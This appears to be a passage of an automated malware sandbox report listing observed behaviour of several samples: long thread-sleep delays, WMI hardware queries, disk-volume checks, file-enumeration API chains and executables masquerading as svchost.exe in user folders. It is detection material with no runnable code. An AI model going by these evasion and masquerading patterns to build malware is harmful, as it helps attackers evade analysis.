                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -21213755684765971s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -600000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -599719s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -599453s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -599265s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -598734s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -598453s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -598255s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -598000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -597781s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -597590s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -597344s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -597170s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -596906s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -596765s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -596219s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -596062s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -595875s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -595656s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -595490s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -595265s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -595047s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -594828s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -594633s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -594437s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -594250s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -593875s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -593594s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -593359s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -593047s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -592797s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -592562s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -592344s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -592140s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -591797s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -591344s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -591062s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -590828s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -590640s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -590406s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -590140s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -589922s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -589724s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -589599s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -589156s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -588984s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -588765s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -588578s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -588390s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -588226s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -588062s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -587873s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -587640s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -587422s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -587265s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -586890s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -586594s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -586375s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -586109s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -585781s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -585422s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -585156s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -584812s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -584276s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -583949s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -583728s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -583515s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -583234s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -583062s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -582812s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -582578s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -582297s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -581890s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -581703s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -581469s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -581312s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -581094s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -580906s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -580716s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -580531s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -580312s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -580015s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -579609s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -579437s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -579276s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -579078s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -578931s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -578703s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -578538s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -578328s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -578125s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -577953s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -577791s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -577500s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -577187s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -577015s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -576856s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -576665s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -576515s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -576297s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -576015s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -575844s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -575656s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -575523s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -575359s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -574969s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -574750s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -574453s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -574181s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -573781s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -573469s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -573219s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -572828s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -572390s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -572203s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -572001s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -571797s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -571500s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -571297s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -571047s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -570859s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -570713s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -570539s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -570156s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -569982s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -569812s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe TID: 7976Thread sleep time: -569646s >= -30000s
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                      Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Roaming\svchost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Roaming\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Roaming\svchost.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Roaming\svchost.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Roaming\svchost.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeCode function: 0_2_00007FF68A187F1C FindFirstFileW,CopyFileW,RegOpenKeyExW,SetFileAttributesW,FindNextFileW,FindClose,0_2_00007FF68A187F1C
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeCode function: 0_2_00007FF68A184F64 SHGetFolderPathW,FindFirstFileW,FindNextFileW,0_2_00007FF68A184F64
                      Source: C:\Windows\explorer.exeCode function: 2_2_0F3C6350 lstrcpy,lstrcatA,CreateDirectoryA,GetLastError,FindFirstFileA,lstrcpy,lstrcatA,lstrcatA,lstrcpy,lstrcatA,lstrcatA,lstrcmp,lstrcmp,CreateDirectoryA,GetLastError,CopyFileA,FindNextFileA,2_2_0F3C6350
                      Source: C:\Windows\System32\relog.exeCode function: 47_2_00007FF6AA334F64 SHGetFolderPathW,FindFirstFileW,FindNextFileW,47_2_00007FF6AA334F64
                      Source: C:\Windows\System32\relog.exeCode function: 47_2_00007FF6AA337F1C FindFirstFileW,CopyFileW,RegOpenKeyExW,SetFileAttributesW,FindNextFileW,FindClose,47_2_00007FF6AA337F1C
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeCode function: 52_2_00007FF7C9B07F1C FindFirstFileW,CopyFileW,RegOpenKeyExW,SetFileAttributesW,FindNextFileW,FindClose,52_2_00007FF7C9B07F1C
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeCode function: 52_2_00007FF7C9B04F64 SHGetFolderPathW,FindFirstFileW,FindNextFileW,52_2_00007FF7C9B04F64
                      Source: C:\Windows\System32\relog.exeCode function: 53_2_00007FF7AE484F64 SHGetFolderPathW,FindFirstFileW,FindNextFileW,53_2_00007FF7AE484F64
                      Source: C:\Windows\System32\relog.exeCode function: 53_2_00007FF7AE487F1C FindFirstFileW,CopyFileW,RegOpenKeyExW,SetFileAttributesW,FindNextFileW,FindClose,53_2_00007FF7AE487F1C
                      Source: C:\Windows\System32\relog.exeCode function: 55_2_00007FF7C07C7F1C FindFirstFileW,CopyFileW,RegOpenKeyExW,SetFileAttributesW,FindNextFileW,FindClose,55_2_00007FF7C07C7F1C
                      Source: C:\Windows\System32\relog.exeCode function: 55_2_00007FF7C07C4F64 SHGetFolderPathW,FindFirstFileW,FindNextFileW,55_2_00007FF7C07C4F64
                      Source: C:\Windows\explorer.exeCode function: 2_2_08CB21AC GetSystemInfo,VirtualQuery,VirtualAlloc,VirtualQuery,VirtualAlloc,2_2_08CB21AC
                      Source: C:\Windows\explorer.exeThread delayed: delay time: 60000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 600000
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 599781
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 599562
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 599125
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 598929
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 598718
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 598515
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 598312
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 598140
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 597953
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 597781
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 597621
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 597421
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 597140
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 596757
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 596578
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 596390
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 596046
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 100000
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 99766
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 99445
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 98954
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 98418
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 98090
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 97869
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 593578
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 593296
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 593125
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 99718
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 99453
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 99093
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 98906
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 98718
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 98515
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 98343
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 591156
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 590968
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 590778
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 590593
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 590375
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 590078
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 589656
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 589479
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 589328
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 589140
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 588993
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 588765
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 588600
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 588343
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 588187
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 588015
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 587853
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 587560
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 587265
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 587125
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 586961
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 586781
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 586635
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 586421
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 586218
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 585984
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 585750
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 585585
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 585421
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 585031
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 584812
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 584515
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 584203
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 583843
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 583531
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 583307
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 583112
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 582562
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 582281
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 582078
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 581921
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 581687
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 581423
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 581258
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 581046
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 580862
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 580671
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 580265
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 580077
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 579875
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 579709
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 579492
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 579296
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 578953
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 578484
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 578078
